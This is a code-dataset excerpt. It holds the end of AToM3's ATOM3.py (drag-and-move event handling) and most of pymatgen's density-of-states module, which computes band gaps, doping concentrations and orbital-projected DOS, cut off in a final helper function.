res = self.ASGroot.preCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global pre-conditions
if res: return self.undodrag(res)
obj = VisualObj.Tag2ObjMap[tag]
# modified 07-march-03: added x, y, initDragX, initDragY parameters
res = obj.semanticObject.preCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global pre-conditions
if res: return self.undodrag(res)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
self.ASGroot.preAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute global pre-actions
obj.semanticObject.preAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute local pre-actions
dx = x-self.initDragX # calculate the displacement in x and y
dy = y-self.initDragY
obj.Move(dx, dy) # Move object (We do not care wether it is a link or an entity)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
res = self.ASGroot.postCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global pre-conditions
if res: return self.undomovebox(res,dx,dy,sel,obj, tag)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
res = obj.semanticObject.postCondition(ASG.MOVE, x, y, self.initDragX, self.initDragY) # evaluate global pre-conditions
if res: return self.undomovebox(res,dx,dy,sel,obj, tag)
# modified 07-march-03: added x, y, initDragX, initDragY parameters
self.ASGroot.postAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute global post-actions
obj.semanticObject.postAction(ASG.MOVE, x, y, self.initDragX, self.initDragY) # execute local post-actions
#
def undomovebox(self, res, dx, dy, sel, obj, tag):
"""
undoes an entity movement, due to a constraint failure...
"""
obj.Move(-dx, -dy)
return self.undodrag(res)
if __name__ == '__main__':
""" WARNING: This code isn't executed if the atom3.py bootup script is used! """
TkRoot = Tk()
TkRoot.configure(cursor='watch')
if len(sys.argv) == 1:
ATOM3(TkRoot, None , 1, 1) #.mainloop()
else:
ATOM3(TkRoot, sys.argv[1] , 1, 1) #.mainloop()
print "\nClosing AToM3 - A Tool for Multi-formalism and Meta-Modelling\n"
|
Balannen/LSMASOMM
|
atom3/Kernel/ATOM3.py
|
Python
|
gpl-3.0
| 249,434
|
[
"OpenMM",
"VisIt"
] |
11bc8b3da76dcfd80ecb3c37bb3bfb9a2dc454f2f5eaaa9a4f8b574da3ed22ba
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines classes to represent the density of states, etc.
"""
import functools
import warnings
from typing import Dict
import numpy as np
from monty.json import MSONable
from scipy.constants.codata import value as _cd
from pymatgen.core.periodic_table import get_el_sp
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.spectrum import Spectrum
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.core import Orbital, Spin
from pymatgen.util.coord import get_linear_interpolated_value
from pymatgen.util.typing import ArrayLike, SpeciesLike
class DOS(Spectrum):
"""
Replacement basic DOS object. All other DOS objects are extended versions
of this object. Work in progress.
.. attribute: energies
The sequence of energies
.. attribute: densities
A dict of spin densities, e.g., {Spin.up: [...], Spin.down: [...]}
.. attribute: efermi
Fermi level
"""
XLABEL = "Energy"
YLABEL = "Density"
def __init__(self, energies: ArrayLike, densities: ArrayLike, efermi: float):
"""
Args:
energies: A sequence of energies
densities (ndarray): Either a Nx1 or a Nx2 array. If former, it is
interpreted as a Spin.up only density. Otherwise, the first column
is interpreted as Spin.up and the other is Spin.down.
efermi: Fermi level energy.
"""
super().__init__(energies, densities, efermi)
self.efermi = efermi
def get_interpolated_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
Expects a DOS object and finds the gap
Args:
tol: tolerance in occupations for determining the gap
abs_tol: Set to True for an absolute tolerance and False for a
relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(gap, cbm, vbm):
Tuple of floats in eV corresponding to the gap, cbm and vbm.
"""
if spin is None:
tdos = self.y if len(self.ydim) == 1 else np.sum(self.y, axis=1)
elif spin == Spin.up:
tdos = self.y[:, 0]
else:
tdos = self.y[:, 1]
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0] # type: ignore
energies = self.x
below_fermi = [i for i in range(len(energies)) if energies[i] < self.efermi and tdos[i] > tol]
above_fermi = [i for i in range(len(energies)) if energies[i] > self.efermi and tdos[i] > tol]
vbm_start = max(below_fermi)
cbm_start = min(above_fermi)
if vbm_start == cbm_start:
return 0.0, self.efermi, self.efermi
# Interpolate between adjacent values
terminal_dens = tdos[vbm_start : vbm_start + 2][::-1]
terminal_energies = energies[vbm_start : vbm_start + 2][::-1]
start = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
terminal_dens = tdos[cbm_start - 1 : cbm_start + 1]
terminal_energies = energies[cbm_start - 1 : cbm_start + 1]
end = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
return end - start, end, start
def get_cbm_vbm(self, tol: float = 0.001, abs_tol: bool = False, spin=None):
"""
Expects a DOS object and finds the cbm and vbm.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: An absolute tolerance (True) and a relative one (False)
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(cbm, vbm): float in eV corresponding to the gap
"""
# determine tolerance
if spin is None:
tdos = self.y if len(self.ydim) == 1 else np.sum(self.y, axis=1)
elif spin == Spin.up:
tdos = self.y[:, 0]
else:
tdos = self.y[:, 1]
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0] # type: ignore
# find index of fermi energy
i_fermi = 0
while self.x[i_fermi] <= self.efermi:
i_fermi += 1
# work backwards until tolerance is reached
i_gap_start = i_fermi
while i_gap_start - 1 >= 0 and tdos[i_gap_start - 1] <= tol:
i_gap_start -= 1
# work forwards until tolerance is reached
i_gap_end = i_gap_start
while i_gap_end < tdos.shape[0] and tdos[i_gap_end] <= tol:
i_gap_end += 1
i_gap_end -= 1
return self.x[i_gap_end], self.x[i_gap_start]
def get_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
Expects a DOS object and finds the gap.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: An absolute tolerance (True) and a relative one (False)
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
gap in eV
"""
(cbm, vbm) = self.get_cbm_vbm(tol, abs_tol, spin)
return max(cbm - vbm, 0.0)
def __str__(self):
"""
Returns a string which can be easily plotted (using gnuplot).
"""
if Spin.down in self.densities:
stringarray = ["#{:30s} {:30s} {:30s}".format("Energy", "DensityUp", "DensityDown")]
for i, energy in enumerate(self.energies):
stringarray.append(
"{:.5f} {:.5f} {:.5f}".format(energy, self.densities[Spin.up][i], self.densities[Spin.down][i])
)
else:
stringarray = ["#{:30s} {:30s}".format("Energy", "DensityUp")]
for i, energy in enumerate(self.energies):
stringarray.append("{:.5f} {:.5f}".format(energy, self.densities[Spin.up][i]))
return "\n".join(stringarray)
class Dos(MSONable):
"""
Basic DOS object. All other DOS objects are extended versions of this
object.
.. attribute: energies
The sequence of energies
.. attribute: densities
A dict of spin densities, e.g., {Spin.up: [...], Spin.down: [...]}
.. attribute: efermi
Fermi level
"""
def __init__(self, efermi: float, energies: ArrayLike, densities: Dict[Spin, ArrayLike]):
"""
Args:
efermi: Fermi level energy
energies: A sequences of energies
densities ({Spin: np.array}): representing the density of states
for each Spin.
"""
self.efermi = efermi
self.energies = np.array(energies)
self.densities = {k: np.array(d) for k, d in densities.items()}
def get_densities(self, spin: Spin = None):
"""
Returns the density of states for a particular spin.
Args:
spin: Spin
Returns:
Returns the density of states for a particular spin. If Spin is
None, the sum of all spins is returned.
"""
if self.densities is None:
result = None
elif spin is None:
if Spin.down in self.densities:
result = self.densities[Spin.up] + self.densities[Spin.down]
else:
result = self.densities[Spin.up]
else:
result = self.densities[spin]
return result
def get_smeared_densities(self, sigma: float):
"""
Returns the Dict representation of the densities, {Spin: densities},
but with a Gaussian smearing of std dev sigma applied about the fermi
level.
Args:
sigma: Std dev of Gaussian smearing function.
Returns:
Dict of Gaussian-smeared densities.
"""
from scipy.ndimage.filters import gaussian_filter1d
smeared_dens = {}
diff = [self.energies[i + 1] - self.energies[i] for i in range(len(self.energies) - 1)]
avgdiff = sum(diff) / len(diff)
for spin, dens in self.densities.items():
smeared_dens[spin] = gaussian_filter1d(dens, sigma / avgdiff)
return smeared_dens
def __add__(self, other):
"""
Adds two DOS together. Checks that energy scales are the same.
Otherwise, a ValueError is thrown.
Args:
other: Another DOS object.
Returns:
Sum of the two DOSs.
"""
if not all(np.equal(self.energies, other.energies)):
raise ValueError("Energies of both DOS are not compatible!")
densities = {spin: self.densities[spin] + other.densities[spin] for spin in self.densities.keys()}
return Dos(self.efermi, self.energies, densities)
def get_interpolated_value(self, energy: float):
"""
Returns interpolated density for a particular energy.
Args:
energy: Energy to return the density for.
"""
f = {}
for spin in self.densities.keys():
f[spin] = get_linear_interpolated_value(self.energies, self.densities[spin], energy)
return f
def get_interpolated_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
Expects a DOS object and finds the gap
Args:
tol: tolerance in occupations for determining the gap
abs_tol: Set to True for an absolute tolerance and False for a
relative one.
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(gap, cbm, vbm):
Tuple of floats in eV corresponding to the gap, cbm and vbm.
"""
tdos = self.get_densities(spin)
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0]
energies = self.energies
below_fermi = [i for i in range(len(energies)) if energies[i] < self.efermi and tdos[i] > tol]
above_fermi = [i for i in range(len(energies)) if energies[i] > self.efermi and tdos[i] > tol]
vbm_start = max(below_fermi)
cbm_start = min(above_fermi)
if vbm_start == cbm_start:
return 0.0, self.efermi, self.efermi
# Interpolate between adjacent values
terminal_dens = tdos[vbm_start : vbm_start + 2][::-1]
terminal_energies = energies[vbm_start : vbm_start + 2][::-1]
start = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
terminal_dens = tdos[cbm_start - 1 : cbm_start + 1]
terminal_energies = energies[cbm_start - 1 : cbm_start + 1]
end = get_linear_interpolated_value(terminal_dens, terminal_energies, tol)
return end - start, end, start
def get_cbm_vbm(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
Expects a DOS object and finds the cbm and vbm.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: An absolute tolerance (True) and a relative one (False)
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
(cbm, vbm): float in eV corresponding to the gap
"""
# determine tolerance
tdos = self.get_densities(spin)
if not abs_tol:
tol = tol * tdos.sum() / tdos.shape[0]
# find index of fermi energy
i_fermi = 0
while self.energies[i_fermi] <= self.efermi:
i_fermi += 1
# work backwards until tolerance is reached
i_gap_start = i_fermi
while i_gap_start - 1 >= 0 and tdos[i_gap_start - 1] <= tol:
i_gap_start -= 1
# work forwards until tolerance is reached
i_gap_end = i_gap_start
while i_gap_end < tdos.shape[0] and tdos[i_gap_end] <= tol:
i_gap_end += 1
i_gap_end -= 1
return self.energies[i_gap_end], self.energies[i_gap_start]
def get_gap(self, tol: float = 0.001, abs_tol: bool = False, spin: Spin = None):
"""
Expects a DOS object and finds the gap.
Args:
tol: tolerance in occupations for determining the gap
abs_tol: An absolute tolerance (True) and a relative one (False)
spin: Possible values are None - finds the gap in the summed
densities, Up - finds the gap in the up spin channel,
Down - finds the gap in the down spin channel.
Returns:
gap in eV
"""
(cbm, vbm) = self.get_cbm_vbm(tol, abs_tol, spin)
return max(cbm - vbm, 0.0)
def __str__(self):
"""
Returns a string which can be easily plotted (using gnuplot).
"""
if Spin.down in self.densities:
stringarray = ["#{:30s} {:30s} {:30s}".format("Energy", "DensityUp", "DensityDown")]
for i, energy in enumerate(self.energies):
stringarray.append(
"{:.5f} {:.5f} {:.5f}".format(energy, self.densities[Spin.up][i], self.densities[Spin.down][i])
)
else:
stringarray = ["#{:30s} {:30s}".format("Energy", "DensityUp")]
for i, energy in enumerate(self.energies):
stringarray.append("{:.5f} {:.5f}".format(energy, self.densities[Spin.up][i]))
return "\n".join(stringarray)
@classmethod
def from_dict(cls, d) -> "Dos":
"""
Returns Dos object from dict representation of Dos.
"""
return Dos(
d["efermi"],
d["energies"],
{Spin(int(k)): v for k, v in d["densities"].items()},
)
def as_dict(self) -> dict:
"""
Json-serializable dict representation of Dos.
"""
return {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
}
class FermiDos(Dos, MSONable):
"""
This wrapper class helps relate the density of states, doping levels
(i.e. carrier concentrations) and corresponding fermi levels. A negative
doping concentration indicates the majority carriers are electrons
(n-type doping); a positive doping concentration indicates holes are the
majority carriers (p-type doping).
"""
def __init__(
self,
dos: Dos,
structure: Structure = None,
nelecs: float = None,
bandgap: float = None,
):
"""
Args:
dos: Pymatgen Dos object.
structure: A structure. If not provided, the structure
of the dos object will be used. If the dos does not have an
associated structure object, an error will be thrown.
nelecs: The number of electrons included in the energy range of
dos. It is used for normalizing the densities. Default is the total
number of electrons in the structure.
bandgap: If set, the energy values are scissored so that the electronic
band gap matches this value.
"""
super().__init__(
dos.efermi,
energies=dos.energies,
densities={k: np.array(d) for k, d in dos.densities.items()},
)
if structure is None:
if hasattr(dos, "structure"):
structure = dos.structure
else:
raise ValueError("Structure object is not provided and not " "present in dos")
self.structure = structure
self.nelecs = nelecs or self.structure.composition.total_electrons
self.volume = self.structure.volume
self.energies = np.array(dos.energies)
self.de = np.hstack((self.energies[1:], self.energies[-1])) - self.energies
# normalize total density of states based on integral at 0K
tdos = np.array(self.get_densities())
self.tdos = tdos * self.nelecs / (tdos * self.de)[self.energies <= self.efermi].sum()
ecbm, evbm = self.get_cbm_vbm()
self.idx_vbm = int(np.argmin(abs(self.energies - evbm)))
self.idx_cbm = int(np.argmin(abs(self.energies - ecbm)))
self.A_to_cm = 1e-8
if bandgap:
if evbm < self.efermi < ecbm:
eref = self.efermi
else:
eref = (evbm + ecbm) / 2.0
idx_fermi = int(np.argmin(abs(self.energies - eref)))
if idx_fermi == self.idx_vbm:
# Fermi level and vbm should be different indices
idx_fermi += 1
self.energies[:idx_fermi] -= (bandgap - (ecbm - evbm)) / 2.0
self.energies[idx_fermi:] += (bandgap - (ecbm - evbm)) / 2.0
def get_doping(self, fermi_level: float, temperature: float) -> float:
"""
Calculate the doping (majority carrier concentration) at a given
fermi level and temperature. A simple Left Riemann sum is used for
integrating the density of states over energy & equilibrium Fermi-Dirac
distribution.
Args:
fermi_level: The fermi_level level in eV.
temperature: The temperature in Kelvin.
Returns:
The doping concentration in units of 1/cm^3. Negative values
indicate that the majority carriers are electrons (n-type doping)
whereas positivie values indicates the majority carriers are holes
(p-type doping).
"""
cb_integral = np.sum(
self.tdos[self.idx_cbm :]
* f0(self.energies[self.idx_cbm :], fermi_level, temperature)
* self.de[self.idx_cbm :],
axis=0,
)
vb_integral = np.sum(
self.tdos[: self.idx_vbm + 1]
* (1 - f0(self.energies[: self.idx_vbm + 1], fermi_level, temperature))
* self.de[: self.idx_vbm + 1],
axis=0,
)
return (vb_integral - cb_integral) / (self.volume * self.A_to_cm ** 3)
def get_fermi_interextrapolated(
self, concentration: float, temperature: float, warn: bool = True, c_ref: float = 1e10, **kwargs
) -> float:
"""
Similar to get_fermi except that when get_fermi fails to converge,
an interpolated or extrapolated fermi is returned with the assumption
that the fermi level changes linearly with log(abs(concentration)).
Args:
concentration: The doping concentration in 1/cm^3. Negative values
represent n-type doping and positive values represent p-type
doping.
temperature: The temperature in Kelvin.
warn: Whether to give a warning the first time the fermi cannot be
found.
c_ref: A doping concentration where get_fermi returns a
value without error for both c_ref and -c_ref.
**kwargs: Keyword arguments passed to the get_fermi function.
Returns:
The Fermi level. Note, the value is possibly interpolated or
extrapolated and must be used with caution.
"""
try:
return self.get_fermi(concentration, temperature, **kwargs)
except ValueError as e:
if warn:
warnings.warn(str(e))
if abs(concentration) < c_ref:
if abs(concentration) < 1e-10:
concentration = 1e-10
# max(10, ) is to avoid log(0<x<1) and log(1+x) both of which
# are slow
f2 = self.get_fermi_interextrapolated(
max(10, abs(concentration) * 10.0), temperature, warn=False, **kwargs
)
f1 = self.get_fermi_interextrapolated(
-max(10, abs(concentration) * 10.0), temperature, warn=False, **kwargs
)
c2 = np.log(abs(1 + self.get_doping(f2, temperature)))
c1 = -np.log(abs(1 + self.get_doping(f1, temperature)))
slope = (f2 - f1) / (c2 - c1)
return f2 + slope * (np.sign(concentration) * np.log(abs(1 + concentration)) - c2)
f_ref = self.get_fermi_interextrapolated(np.sign(concentration) * c_ref, temperature, warn=False, **kwargs)
f_new = self.get_fermi_interextrapolated(concentration / 10.0, temperature, warn=False, **kwargs)
clog = np.sign(concentration) * np.log(abs(concentration))
c_newlog = np.sign(concentration) * np.log(abs(self.get_doping(f_new, temperature)))
slope = (f_new - f_ref) / (c_newlog - np.sign(concentration) * 10.0)
return f_new + slope * (clog - c_newlog)
def get_fermi(
self,
concentration: float,
temperature: float,
rtol: float = 0.01,
nstep: int = 50,
step: float = 0.1,
precision: int = 8,
):
"""
Finds the fermi level at which the doping concentration at the given
temperature (T) is equal to concentration. A greedy algorithm is used
where the relative error is minimized by calculating the doping at a
grid which continually becomes finer.
Args:
concentration: The doping concentration in 1/cm^3. Negative values
represent n-type doping and positive values represent p-type
doping.
temperature: The temperature in Kelvin.
rtol: The maximum acceptable relative error.
nstep: THe number of steps checked around a given fermi level.
step: Initial step in energy when searching for the Fermi level.
precision: Essentially the decimal places of calculated Fermi level.
Returns:
The fermi level in eV.. Note that this is different from the default
dos.efermi.
"""
fermi = self.efermi # initialize target fermi
relative_error = [float("inf")]
for _ in range(precision):
frange = np.arange(-nstep, nstep + 1) * step + fermi
calc_doping = np.array([self.get_doping(f, temperature) for f in frange])
relative_error = np.abs(calc_doping / concentration - 1.0)
fermi = frange[np.argmin(relative_error)]
step /= 10.0
if min(relative_error) > rtol:
raise ValueError("Could not find fermi within {}% of concentration={}".format(rtol * 100, concentration))
return fermi
@classmethod
def from_dict(cls, d) -> "FermiDos":
"""
Returns Dos object from dict representation of Dos.
"""
dos = Dos(
d["efermi"],
d["energies"],
{Spin(int(k)): v for k, v in d["densities"].items()},
)
return FermiDos(dos, structure=Structure.from_dict(d["structure"]), nelecs=d["nelecs"])
def as_dict(self) -> dict:
"""
Json-serializable dict representation of Dos.
"""
return {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
"structure": self.structure,
"nelecs": self.nelecs,
}
class CompleteDos(Dos):
"""
This wrapper class defines a total dos, and also provides a list of PDos.
Mainly used by pymatgen.io.vasp.Vasprun to create a complete Dos from
a vasprun.xml file. You are unlikely to try to generate this object
manually.
.. attribute:: structure
Structure associated with the CompleteDos.
.. attribute:: pdos
Dict of partial densities of the form {Site:{Orbital:{Spin:Densities}}}
"""
def __init__(
self, structure: Structure, total_dos: Dos, pdoss: Dict[PeriodicSite, Dict[Orbital, Dict[Spin, ArrayLike]]]
):
"""
Args:
structure: Structure associated with this particular DOS.
total_dos: total Dos for structure
pdoss: The pdoss are supplied as an {Site:{Orbital:{
Spin:Densities}}}
"""
super().__init__(
total_dos.efermi,
energies=total_dos.energies,
densities={k: np.array(d) for k, d in total_dos.densities.items()},
)
self.pdos = pdoss
self.structure = structure
def get_site_orbital_dos(self, site: PeriodicSite, orbital: Orbital) -> Dos:
"""
Get the Dos for a particular orbital of a particular site.
Args:
site: Site in Structure associated with CompleteDos.
orbital: Orbital in the site.
Returns:
Dos containing densities for orbital of site.
"""
return Dos(self.efermi, self.energies, self.pdos[site][orbital])
def get_site_dos(self, site: PeriodicSite) -> Dos:
"""
Get the total Dos for a site (all orbitals).
Args:
site: Site in Structure associated with CompleteDos.
Returns:
Dos containing summed orbital densities for site.
"""
site_dos = functools.reduce(add_densities, self.pdos[site].values())
return Dos(self.efermi, self.energies, site_dos)
def get_site_spd_dos(self, site: PeriodicSite) -> Dict[Orbital, Dos]:
"""
Get orbital projected Dos of a particular site
Args:
site: Site in Structure associated with CompleteDos.
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos: Dict[Orbital, Dict[Spin, ArrayLike]] = dict()
for orb, pdos in self.pdos[site].items():
orbital_type = _get_orb_type(orb)
if orbital_type in spd_dos:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
else:
spd_dos[orbital_type] = pdos
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_site_t2g_eg_resolved_dos(self, site: PeriodicSite) -> Dict[str, Dos]:
"""
Get the t2g, eg projected DOS for a particular site.
Args:
site: Site in Structure associated with CompleteDos.
Returns:
A dict {"e_g": Dos, "t2g": Dos} containing summed e_g and t2g DOS
for the site.
"""
t2g_dos = []
eg_dos = []
for s, atom_dos in self.pdos.items():
if s == site:
for orb, pdos in atom_dos.items():
if orb in (Orbital.dxy, Orbital.dxz, Orbital.dyz):
t2g_dos.append(pdos)
elif orb in (Orbital.dx2, Orbital.dz2):
eg_dos.append(pdos)
return {
"t2g": Dos(self.efermi, self.energies, functools.reduce(add_densities, t2g_dos)),
"e_g": Dos(self.efermi, self.energies, functools.reduce(add_densities, eg_dos)),
}
def get_spd_dos(self) -> Dict[Orbital, Dos]:
"""
Get orbital projected Dos.
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos = {}
for atom_dos in self.pdos.values():
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type(orb)
if orbital_type not in spd_dos:
spd_dos[orbital_type] = pdos
else:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_element_dos(self) -> Dict[SpeciesLike, Dos]:
"""
Get element projected Dos.
Returns:
dict of {Element: Dos}
"""
el_dos = {}
for site, atom_dos in self.pdos.items():
el = site.specie
for pdos in atom_dos.values():
if el not in el_dos:
el_dos[el] = pdos
else:
el_dos[el] = add_densities(el_dos[el], pdos)
return {el: Dos(self.efermi, self.energies, densities) for el, densities in el_dos.items()}
def get_element_spd_dos(self, el: SpeciesLike) -> Dict[Orbital, Dos]:
"""
Get element and spd projected Dos
Args:
el: Element in Structure.composition associated with CompleteDos
Returns:
dict of {Element: {"S": densities, "P": densities, "D": densities}}
"""
el = get_el_sp(el)
el_dos = {}
for site, atom_dos in self.pdos.items():
if site.specie == el:
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type(orb)
if orbital_type not in el_dos:
el_dos[orbital_type] = pdos
else:
el_dos[orbital_type] = add_densities(el_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in el_dos.items()}
@property
def spin_polarization(self) -> float:
"""
Calculates spin polarization at Fermi level.
See Sanvito et al., doi: 10.1126/sciadv.1602241 for
an example usage.
:return (float): spin polarization in range [0, 1],
will also return NaN if spin polarization ill-defined
(e.g. for insulator)
"""
n_F = self.get_interpolated_value(self.efermi)
n_F_up = n_F[Spin.up]
n_F_down = n_F[Spin.down]
if (n_F_up + n_F_down) == 0:
# only well defined for metals or half-mteals
return float("NaN")
spin_polarization = (n_F_up - n_F_down) / (n_F_up + n_F_down)
return abs(spin_polarization)
@classmethod
def from_dict(cls, d) -> "CompleteDos":
"""
Returns CompleteDos object from dict representation.
"""
tdos = Dos.from_dict(d)
struct = Structure.from_dict(d["structure"])
pdoss = {}
for i in range(len(d["pdos"])):
at = struct[i]
orb_dos = {}
for orb_str, odos in d["pdos"][i].items():
orb = Orbital[orb_str]
orb_dos[orb] = {Spin(int(k)): v for k, v in odos["densities"].items()}
pdoss[at] = orb_dos
return CompleteDos(struct, tdos, pdoss)
def as_dict(self) -> dict:
"""
Json-serializable dict representation of CompleteDos.
"""
d = {
"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"efermi": self.efermi,
"structure": self.structure.as_dict(),
"energies": self.energies.tolist(),
"densities": {str(spin): dens.tolist() for spin, dens in self.densities.items()},
"pdos": [],
}
if len(self.pdos) > 0:
for at in self.structure:
dd = {}
for orb, pdos in self.pdos[at].items():
dd[str(orb)] = {
"densities": {str(int(spin)): list(dens) for spin, dens in pdos.items()} # type: ignore
}
d["pdos"].append(dd)
d["atom_dos"] = {str(at): dos.as_dict() for at, dos in self.get_element_dos().items()}
d["spd_dos"] = {str(orb): dos.as_dict() for orb, dos in self.get_spd_dos().items()}
return d
def __str__(self):
return "Complete DOS for " + str(self.structure)
class LobsterCompleteDos(CompleteDos):
"""
Extended CompleteDOS for Lobster
"""
def get_site_orbital_dos(self, site: PeriodicSite, orbital: str) -> Dos: # type: ignore
"""
Get the Dos for a particular orbital of a particular site.
Args:
site: Site in Structure associated with CompleteDos.
orbital: principal quantum number and orbital in string format, e.g. "4s".
possible orbitals are: "s", "p_y", "p_z", "p_x", "d_xy", "d_yz", "d_z^2",
"d_xz", "d_x^2-y^2", "f_y(3x^2-y^2)", "f_xyz",
"f_yz^2", "f_z^3", "f_xz^2", "f_z(x^2-y^2)", "f_x(x^2-3y^2)"
In contrast to the Cohpcar and the Cohplist objects, the strings from the Lobster files are used
Returns:
Dos containing densities of an orbital of a specific site.
"""
if orbital[1:] not in [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]:
raise ValueError("orbital is not correct")
return Dos(self.efermi, self.energies, self.pdos[site][orbital]) # type: ignore
def get_site_t2g_eg_resolved_dos(self, site: PeriodicSite) -> Dict[str, Dos]:
"""
Get the t2g, eg projected DOS for a particular site.
Args:
site: Site in Structure associated with CompleteDos.
Returns:
A dict {"e_g": Dos, "t2g": Dos} containing summed e_g and t2g DOS
for the site.
"""
warnings.warn("Are the orbitals correctly oriented? Are you sure?")
t2g_dos = []
eg_dos = []
for s, atom_dos in self.pdos.items():
if s == site:
for orb, pdos in atom_dos.items():
if _get_orb_lobster(orb) in (Orbital.dxy, Orbital.dxz, Orbital.dyz):
t2g_dos.append(pdos)
elif _get_orb_lobster(orb) in (Orbital.dx2, Orbital.dz2):
eg_dos.append(pdos)
return {
"t2g": Dos(self.efermi, self.energies, functools.reduce(add_densities, t2g_dos)),
"e_g": Dos(self.efermi, self.energies, functools.reduce(add_densities, eg_dos)),
}
def get_spd_dos(self) -> Dict[str, Dos]: # type: ignore
"""
Get orbital projected Dos.
For example, if 3s and 4s are included in the basis of some element, they will be both summed in the orbital
projected DOS
Returns:
dict of {orbital: Dos}, e.g. {"s": Dos object, ...}
"""
spd_dos = {}
for atom_dos in self.pdos.values():
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type_lobster(orb)
if orbital_type not in spd_dos:
spd_dos[orbital_type] = pdos
else:
spd_dos[orbital_type] = add_densities(spd_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in spd_dos.items()}
def get_element_spd_dos(self, el: SpeciesLike) -> Dict[str, Dos]: # type: ignore
"""
Get element and spd projected Dos
Args:
el: Element in Structure.composition associated with LobsterCompleteDos
Returns:
dict of {"S": densities, "P": densities, "D": densities}
"""
el = get_el_sp(el)
el_dos = {}
for site, atom_dos in self.pdos.items():
if site.specie == el:
for orb, pdos in atom_dos.items():
orbital_type = _get_orb_type_lobster(orb)
if orbital_type not in el_dos:
el_dos[orbital_type] = pdos
else:
el_dos[orbital_type] = add_densities(el_dos[orbital_type], pdos)
return {orb: Dos(self.efermi, self.energies, densities) for orb, densities in el_dos.items()}
@classmethod
def from_dict(cls, d) -> "LobsterCompleteDos":
"""
Returns: CompleteDos object from dict representation.
"""
tdos = Dos.from_dict(d)
struct = Structure.from_dict(d["structure"])
pdoss = {}
for i in range(len(d["pdos"])):
at = struct[i]
orb_dos = {}
for orb_str, odos in d["pdos"][i].items():
orb = orb_str
orb_dos[orb] = {Spin(int(k)): v for k, v in odos["densities"].items()}
pdoss[at] = orb_dos
return LobsterCompleteDos(struct, tdos, pdoss)
def add_densities(density1: Dict[Spin, ArrayLike], density2: Dict[Spin, ArrayLike]) -> Dict[Spin, ArrayLike]:
"""
Method to sum two densities.
Args:
density1: First density.
density2: Second density.
Returns:
Dict of {spin: density}.
"""
return {spin: np.array(density1[spin]) + np.array(density2[spin]) for spin in density1.keys()}
def _get_orb_type(orb):
try:
return orb.orbital_type
except AttributeError:
return orb
def f0(E, fermi, T):
"""
Returns the equilibrium fermi-dirac.
Args:
E (float): energy in eV
fermi (float): the fermi level in eV
T (float): the temperature in kelvin
"""
return 1.0 / (1.0 + np.exp((E - fermi) / (_cd("Boltzmann constant in eV/K") * T)))
def _get_orb_type_lobster(orb):
"""
Args:
orb: string representation of orbital
Returns:
OrbitalType
"""
orb_labs = [
"s",
"p_y",
"p_z",
"p_x",
"d_xy",
"d_yz",
"d_z^2",
"d_xz",
"d_x^2-y^2",
"f_y(3x^2-y^2)",
"f_xyz",
"f_yz^2",
"f_z^3",
"f_xz^2",
"f_z(x^2-y^2)",
"f_x(x^2-3y^2)",
]
try:
orbital = Orbital(orb_labs.index(orb[1:]))
return orbital.orbital_type
except AttributeError:
print("Orb not in list")
return None
def _get_orb_lobster(orb):
"""
Args:
orb: string representation of orbital
Returns:
Orbital
"""
